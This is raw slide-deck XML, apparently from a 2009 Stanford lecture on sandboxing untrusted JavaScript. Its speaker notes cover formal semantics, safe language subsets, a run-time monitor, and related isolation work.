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61" r:id="rId3"/>
    <p:sldId id="260" r:id="rId4"/>
    <p:sldId id="258" r:id="rId5"/>
    <p:sldId id="257" r:id="rId6"/>
    <p:sldId id="301" r:id="rId7"/>
    <p:sldId id="298" r:id="rId8"/>
    <p:sldId id="262" r:id="rId9"/>
    <p:sldId id="300" r:id="rId10"/>
    <p:sldId id="308" r:id="rId11"/>
    <p:sldId id="266" r:id="rId12"/>
    <p:sldId id="292" r:id="rId13"/>
    <p:sldId id="291" r:id="rId14"/>
    <p:sldId id="264" r:id="rId15"/>
    <p:sldId id="267" r:id="rId16"/>
    <p:sldId id="268" r:id="rId17"/>
    <p:sldId id="309" r:id="rId18"/>
    <p:sldId id="269" r:id="rId19"/>
    <p:sldId id="270" r:id="rId20"/>
    <p:sldId id="271" r:id="rId21"/>
    <p:sldId id="272" r:id="rId22"/>
    <p:sldId id="302" r:id="rId23"/>
    <p:sldId id="281" r:id="rId24"/>
    <p:sldId id="311" r:id="rId25"/>
    <p:sldId id="320" r:id="rId26"/>
    <p:sldId id="321" r:id="rId27"/>
    <p:sldId id="322" r:id="rId28"/>
    <p:sldId id="323" r:id="rId29"/>
    <p:sldId id="312" r:id="rId30"/>
    <p:sldId id="313" r:id="rId31"/>
    <p:sldId id="314" r:id="rId32"/>
    <p:sldId id="315" r:id="rId33"/>
    <p:sldId id="316" r:id="rId34"/>
    <p:sldId id="317" r:id="rId35"/>
    <p:sldId id="318" r:id="rId36"/>
    <p:sldId id="319" r:id="rId37"/>
    <p:sldId id="303" r:id="rId38"/>
    <p:sldId id="286" r:id="rId39"/>
    <p:sldId id="287" r:id="rId40"/>
    <p:sldId id="304" r:id="rId41"/>
    <p:sldId id="305" r:id="rId42"/>
    <p:sldId id="306" r:id="rId43"/>
    <p:sldId id="330" r:id="rId44"/>
    <p:sldId id="332" r:id="rId45"/>
    <p:sldId id="334" r:id="rId46"/>
    <p:sldId id="289" r:id="rId47"/>
    <p:sldId id="307" r:id="rId48"/>
    <p:sldId id="290" r:id="rId49"/>
    <p:sldId id="329" r:id="rId50"/>
    <p:sldId id="333" r:id="rId51"/>
    <p:sldId id="276" r:id="rId52"/>
    <p:sldId id="277" r:id="rId53"/>
    <p:sldId id="324" r:id="rId54"/>
    <p:sldId id="325" r:id="rId55"/>
    <p:sldId id="326" r:id="rId56"/>
    <p:sldId id="32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a:srgbClr val="8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1541" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="54" d="100"/>
          <a:sy n="54" d="100"/>
        </p:scale>
        <p:origin x="-47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6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D498A-74FD-4803-B112-1B947B69232F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12/2/2009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5D215-20E8-4BB1-B08E-0EB351948D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12F53F7-1750-4A29-BBF2-CAEF78AFCD9D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>11</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D083F-9B55-45C5-83E4-7DBBCBA96EC2}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>33</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t>We now address the first of the two limitations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>For the details of how to get the scope using try-catch and named recursive funcions, see [CSF’09]</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C320C-B9EC-472F-8258-FE04FE795B62}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>34</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t>The theorem for J(B)G has the same side conditions as the one for J(B).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33EF8-F6E4-45E1-9C1B-16D20ABB25C2}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>35</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t>Again, same side conditions like in the theorem for J(B). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>More details on this subset can be found in our W2SP’09 paper.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9DAFD-B00E-4227-8574-E5F2D163CEBC}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>36</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t>We now address the second limitation of J(B).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The enforcement mechanism is similar to rewriting, but the correctness proofs are difficult.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BD68AA-DDBF-4820-843D-20F004BB7F53}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>38</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dirty="0"/>
              <a:t>The goals were to protect the DOM, the libraries and the execution environment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In order to do so,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200F2-4E16-494A-A74C-3457970E1E45}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>39</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lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Inject browser exploits on unpatched browsers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Popular applications have millions of users: ideal botnets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> (Both that can be done with iframed applications too…)</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4629AAC-99CC-4E4C-AB6C-A6D355683650}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>49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mtClean="0"/>
              <a:t>Our contribution to these approaches can be to simplify the mechanisms and to prove formal properties. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Related work: Brosershield, Caja, Smash , Docomo, Vikram &amp; Steiner.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Less relevant: Thiemann, Giannini et al., work on Informaton flow for JavaScript, GateKeeper, Lightweight self-protecting JavaScript.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Browsershield introduces a trusted library in the page, and loads remote scripts through a rewriting proxy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>GateKeeper:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Enforce security and reliability policies by filtering and rewriting. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Static analysis to approximate call graph.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Detailed comparison impossible due to lack of details…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Phung:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Unlike our enforcement mechanism, this approach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>does not apply any filtering or code-rewriting to the untrusted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>code, so it is not effective for the isolation of mutually-untrusted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>code.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25D215-20E8-4BB1-B08E-0EB351948D5C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>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280C8BBE-9CD3-4260-9F51-74F48F46345D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>15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46408-82D0-4F1B-AE29-3C7D67DF40AE}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>23</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pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Not an explicit FBJS goal, but one should also consider “No undesired interference between user applications”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>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BC2CD-5574-4598-A57F-449C4CCC4D70}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>25</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t>As a little experiment, I would like to see if anybody that is familiar with JavaSCript can tell me what is the final result of this code before I finish talking through the slide.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Non-compositional: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>var x = {}; x+1; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>depends on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Object.prototype.valueOf;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0F351-DA00-4A29-8B8E-1CB2A88C4C72}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>26</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There are reference books (such as Flanagan’s) and online tutorials that are good for a working knowledge of the language. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>In order to be able to reason about its securiy properties, we had to put JavaScript on a formal basis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Can run in stand-alone shells.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>May become the assembly language for the web.</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8D84B-7002-4AE0-8989-FAF003BA5180}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>29</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pPr lvl="2"/>
            <a:endParaRPr lang="en-US" sz="1000">
              <a:solidFill>
                <a:schemeClr val="folHlink"/>
              </a:solidFill>
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRP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3B388-8F5F-4D85-A74F-432A4AF9CF06}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>30</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t>With considerable effort, we have defined a subset of JavaScript that can be used to enforce blacklisting, and proved that it effectively does so.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E95F0-70B8-4855-A3D1-D1698D74BBEE}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>31</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t>As an example of the subtleties involved in defining such a subset, I will now describe the run-time monitor IDX in detail.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29921-5CFF-48F1-9F67-D7B9DD1DB39B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>32</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t>Proof technique based on inductive invariants. The hard part is to define the invariant for the heap, which can store functions and hence depends on the set of terms being defined.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>If we gave up semantic preservation, we could have used a simpler IDX check.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Reasonable for widget, as shown by a statistic study by Livshitz and Guarnieri.</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60000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Freeform 4"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="21275928">
            <a:off x="-482600" y="-546100"/>
            <a:ext cx="5929313" cy="5954713"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="21600"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="21600" y="1309"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="21600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="21600"/>
                  <a:pt x="2583" y="1745"/>
                  <a:pt x="21600" y="1309"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FFFFFF"/>
              </a:gs>
              <a:gs pos="51294">
                <a:srgbClr val="CCCCCC"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="999999"/>
              </a:gs>
            </a:gsLst>
            <a:path path="rect">
              <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
            </a:path>
          </a:gradFill>
          <a:ln w="12700" cap="flat">
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="25399" dir="2700000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2">
                <a:alpha val="75000"/>
              </a:schemeClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2130425"/>
            <a:ext cx="7772400" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="48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5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="114300" y="228600"/>
            <a:ext cx="1257300" cy="1257300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="76200" dir="12959994" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2">
                <a:alpha val="75000"/>
              </a:schemeClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Freeform 6"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10591363">
            <a:off x="5372663" y="3685274"/>
            <a:ext cx="3994122" cy="3908785"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="21600"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="21600" y="1309"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="21600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="21600"/>
                  <a:pt x="2583" y="1745"/>
                  <a:pt x="21600" y="1309"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FFFFFF"/>
              </a:gs>
              <a:gs pos="517">
                <a:srgbClr val="FFFFFF"/>
              </a:gs>
              <a:gs pos="51294">
                <a:srgbClr val="CCCCCC"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="B3B3B3"/>
              </a:gs>
            </a:gsLst>
            <a:path path="rect">
              <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
            </a:path>
          </a:gradFill>
          <a:ln w="12700" cap="flat">
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="25399" dir="13319987" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2">
                <a:alpha val="75000"/>
              </a:schemeClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16187253">
            <a:off x="6097512" y="2567620"/>
            <a:ext cx="5450470" cy="622300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9A9A9A"/>
                </a:solidFill>
                <a:ea typeface="Gill Sans" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Stanford </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9A9A9A"/>
                </a:solidFill>
                <a:ea typeface="Gill Sans" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Computer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9A9A9A"/>
                </a:solidFill>
                <a:ea typeface="Gill Sans" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t> Security Lab</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248400" y="762000"/>
            <a:ext cx="24384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248400" y="762000"/>
            <a:ext cx="24384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2813" y="1905000"/>
            <a:ext cx="3978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43488" y="1905000"/>
            <a:ext cx="3979862"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912813" y="4076700"/>
            <a:ext cx="8110537"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52525" y="6286500"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Kanellakis Lecture, Brown Univ.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Footer Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3590925" y="6286500"/>
            <a:ext cx="2895600" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Sandboxing Untrusted JavaScript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Number Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7019925" y="6286500"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{4E2AA834-4547-4FCC-B1EF-1E61DDAC4BF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71538" y="533400"/>
            <a:ext cx="8162925"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152525" y="6286500"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Kanellakis Lecture, Brown Univ.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3590925" y="6286500"/>
            <a:ext cx="2895600" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Sandboxing Untrusted JavaScript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7019925" y="6286500"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{EF456079-A434-4970-9984-93BA84FACEF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11" name="Slide Number Placeholder 10"/>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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Footer Placeholder 11"/>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Title 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="198438"/>
            <a:ext cx="8229600" cy="944562"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Date Placeholder 10"/>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12" name="Slide Number Placeholder 11"/>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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Footer Placeholder 12"/>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11"/>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13" name="Slide Number Placeholder 12"/>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11"/>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13" name="Slide Number Placeholder 12"/>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9" name="Slide Number Placeholder 8"/>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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 9"/>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248400" y="762000"/>
            <a:ext cx="24384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248400" y="762000"/>
            <a:ext cx="24384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477000"/>
            <a:ext cx="9144000" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="8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1066800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="8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p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId15" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8153400" y="76200"/>
            <a:ext cx="990600" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1984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4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248400" y="6492875"/>
            <a:ext cx="2438400" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="Gill Sans" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>John C Mitchell      </a:t>
            </a:r>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6492875"/>
            <a:ext cx="2590800" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
